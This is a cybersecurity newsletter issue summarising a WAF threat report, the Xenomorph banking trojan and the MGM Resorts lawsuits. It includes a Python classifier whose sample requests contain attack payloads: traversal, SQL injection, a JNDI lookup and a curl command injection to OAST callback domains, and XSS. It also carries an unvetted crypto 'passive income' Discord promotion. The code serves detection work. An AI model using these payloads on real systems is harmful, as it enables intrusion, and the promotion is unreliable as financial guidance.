Sep 27 2023
Welcome to Gone Phishing, your daily cybersecurity newsletter that laughs in the face of cybercrime. For now, anyway…
Today’s hottest cybersecurity news stories:
Network Effect Threat Report: NLX-tagged sites target tech
Xenomorph Banking Trojan targets more than 35 American banks
MGM Resorts faces class action lawsuit following cyberattacks
Welcome to our Network Effect Threat Report report (lol), your essential guide to fortifying your organisation's cybersecurity!
Maximising the Report's Value
Enhance your awareness of threat actor techniques.
Identify potential attacks homing in on your industry.
Gain invaluable insights to bolster and expedite your organisation's response to threats.
A closer look
The report is crafted from data within Fastly's Next-Gen WAF for the second quarter of 2023. Let’s dive into the key insights that emerged from the research, covering global traffic across various sectors such as High Tech, Financial Services, Commerce, Education, and Media & Entertainment.
1️⃣ Multi-faceted Attacks: 69% of IPs under NLX surveillance targeted multiple clients, with 64% casting a wide net across industries.
2️⃣ Industry in Focus: The High Tech sector bore the brunt of attacks, accounting for 46% of NLX-tagged malicious traffic.
3️⃣ Shifting Strategies: While SQL injection remains prevalent at 28%, Traversal techniques are gaining ground, constituting nearly one-third (32%) of the attacks analysed.
4️⃣ Out-of-Band (OOB) Callbacks: Within NLX data, callback server domains are conspicuous, especially in Log4j JNDI lookups, OS command injection, and Cross-Site Scripting (XSS) attacks. 46% of requests employed recognised out-of-band application security testing (OAST) domains, e.g., interact.sh.
5️⃣ Autonomous Systems (AS): Cloud Hosting providers emerge as the primary source of attack traffic, offering cost-effective computing resources and anonymity for large-scale attacks.
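To show how findings like points 1, 3 and 4 are produced from WAF data, here is an added example (not code from Fastly or the report) that tags sample requests as traversal, SQL injection, XSS or out-of-band callback, then computes each technique's share and which source IPs hit more than one client. interact.sh comes from the report; the other OAST domains, the regexes and the sample events are assumptions constructed for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# interact.sh is named in the report; the other OAST domains are assumed
# examples of the same class of service (constructed list, not Fastly's data).
OAST_DOMAINS = ("interact.sh", "oast.fun", "oastify.com", "burpcollaborator.net")
HOST_RE = re.compile(r"[a-z][a-z0-9+.-]*://([A-Za-z0-9.-]+)", re.I)

def classify(request):
    """Tag one raw request line with the techniques the report tracks."""
    decoded = unquote(unquote(request))  # also catches double-encoded payloads
    tags = set()
    if re.search(r"\.\.[/\\]", decoded):
        tags.add("traversal")
    if re.search(r"['\"]\s*(or|and)\s+\d+=\d+|union\s+select", decoded, re.I):
        tags.add("sqli")
    if re.search(r"<script|\bon\w+\s*=", decoded, re.I):
        tags.add("xss")
    hosts = [h.lower() for h in HOST_RE.findall(decoded)]
    if any(h == d or h.endswith("." + d) for h in hosts for d in OAST_DOMAINS):
        tags.add("oob_callback")  # JNDI lookup, command injection or XSS beacon
    return tags

def summarize(events):
    """events: (src_ip, client, industry, request). Returns the percentage share
    of each technique among tagged requests and the IPs seen hitting more than
    one client, mirroring the report's multi-target and technique-share stats."""
    tech, clients = Counter(), defaultdict(set)
    for ip, client, _industry, request in events:
        tech.update(classify(request))  # one count per tag on this request
        clients[ip].add(client)
    total = sum(tech.values()) or 1
    share = {t: round(100 * n / total) for t, n in tech.items()}
    multi_client = {ip for ip, seen in clients.items() if len(seen) > 1}
    return share, multi_client

# Constructed sample WAF events, not data from the report.
SAMPLE_EVENTS = [
    ("203.0.113.5", "acme", "High Tech", "/files?path=..%2F..%2Fetc%2Fpasswd"),
    ("203.0.113.5", "globex", "Commerce", "/login?user=admin'%20OR%201=1--"),
    ("198.51.100.9", "acme", "High Tech", "/?x=${jndi:ldap://a1.interact.sh/p}"),
    ("198.51.100.9", "acme", "High Tech", "/ping?host=;curl%20http://x.oast.fun/"),
    ("192.0.2.77", "initech", "Education", "/search?q=<script>alert(1)</script>"),
]

if __name__ == "__main__":
    print(summarize(SAMPLE_EVENTS))
```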
Unveiling the Report's Essence
The Network Effect Threat Report draws its insights from NLX's verified malicious activity, offering a broader understanding of the overall threat landscape.
Noteworthy Insights
During the reporting period, NLX tagged over half (54%) of all observed attacks. These attacks often targeted multiple customers and industries, showcasing the interconnected nature of modern threats.
TL;DR?
Here are three key points to take away from this report.
1️⃣ Multi-Target Menace: 69% of IPs targeted multiple clients and 64% aimed at various industries, revealing the broad scope of cyber threats.
2️⃣ High Tech's Hotspot: High Tech took the brunt of attacks, accounting for a whopping 46% of malicious traffic, highlighting its vulnerability.
3️⃣ Traversal Triumph: Traversal techniques surged to 32%, eclipsing SQL injection, suggesting attackers' evolving strategies.
These insights provide a snapshot of the complex and ever-changing cybersecurity landscape. Stay vigilant, cyber squad!
I came across ZZZ money club during the crypto market bull run, when everyone’s a winner. Even during the bear market, this Discord group has been amazing at giving information on projects and ways to make passive income in various ways.
The group is very active, and everyone in this private Discord group is very chatty and helpful.
It's run by Yourfriendandy and Decadeinvestor; you can find them here on YouTube, both top guys with great content.
If you are interested in joining the group, you can through the link below.
Dutch security firm ThreatFabric has detected an updated version of the Android banking trojan, Xenomorph, aimed at over 35 U.S. financial institutions. This campaign employs phishing web pages to lure victims into installing malicious Android apps that now target a wider range of apps than before. Spain, Canada, Italy, and Belgium are among other targeted countries.
Evolution of Xenomorph
Xenomorph, a variant of the Alien banking malware, first emerged in 2022. It evolved to bypass Android 13's security features and later gained the ability to conduct fraudulent transactions using the Automatic Transfer System (ATS). This system allows attackers to seize control of the device, transfer funds, and steal sensitive information via overlay attacks.
Advanced Features
Xenomorph now boasts an "antisleep" feature, screen activity simulation, and app impersonation. It targets popular Android devices, focusing on Samsung and Xiaomi, which together hold a significant market share.
Distribution Tactics
Unlike previous versions, this malware distributes apps through counterfeit websites offering fake Chrome browser updates. The investigation also revealed its use in distributing Windows stealer malware and a loader referred to as Private Loader.
⚠️ Stay Vigilant
Xenomorph remains a highly dangerous Android banking malware. To protect yourself, avoid downloading apps from untrusted sources and keep your device's security software up to date.
Stay safe and informed!
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
HealthHack: Tech is making it easier than ever to reach your fitness goals, from wearable devices to nutrition apps. This newsletter does the research for you and gets all the latest health tech gadgets delivered to your inbox.
₿ Crypto Nutshell: A well-written and beautifully designed newsletter giving you the lowdown on crypto and web3. Highly recommended if you want up-to-date info on the crypto/web3 market.
Big Brain: Trending AI news, jobs and tools delivered in 3 minutes per day.
Let us know what you think!
MGM Resorts finds itself in legal hot water as it faces class action lawsuits filed in Nevada over a recent cyberattack. The lawsuits claim negligence and unjust enrichment, alleging that the company failed to safeguard its customers' data during a suspected social engineering attack.
Negligence Allegations
Plaintiffs argue that MGM should have been aware of the risks due to prior warnings from Okta, which had been repeatedly targeted for similar attacks. They claim MGM didn't take adequate steps to protect customer data.
Operations Restored
While MGM Resorts has restored its hotel and casino operations after over 10 days of disruption, concerns linger. Guests are advised to monitor their MGM Rewards Mastercard accounts for potential fraud.
Linked Threat Groups
Security researchers link the Scattered Spider and AlphV/BlackCat threat groups to the attack. It's suspected that these groups may have collaborated, possibly using ransomware-as-a-service infrastructure.
Data Breach History
MGM Resorts has faced cyberattacks before, with a major breach in 2019. This latest incident is a stark reminder of the ongoing cybersecurity challenges in the casino industry.
The situation remains under investigation by the FBI, with assistance from the Cybersecurity and Infrastructure Security Agency and Okta. The Federal Trade Commission has not commented on potential investigations at this time.
Stay tuned for updates on this high-stakes legal battle! That’s all for today, folks!
So long and thanks for reading all the phish!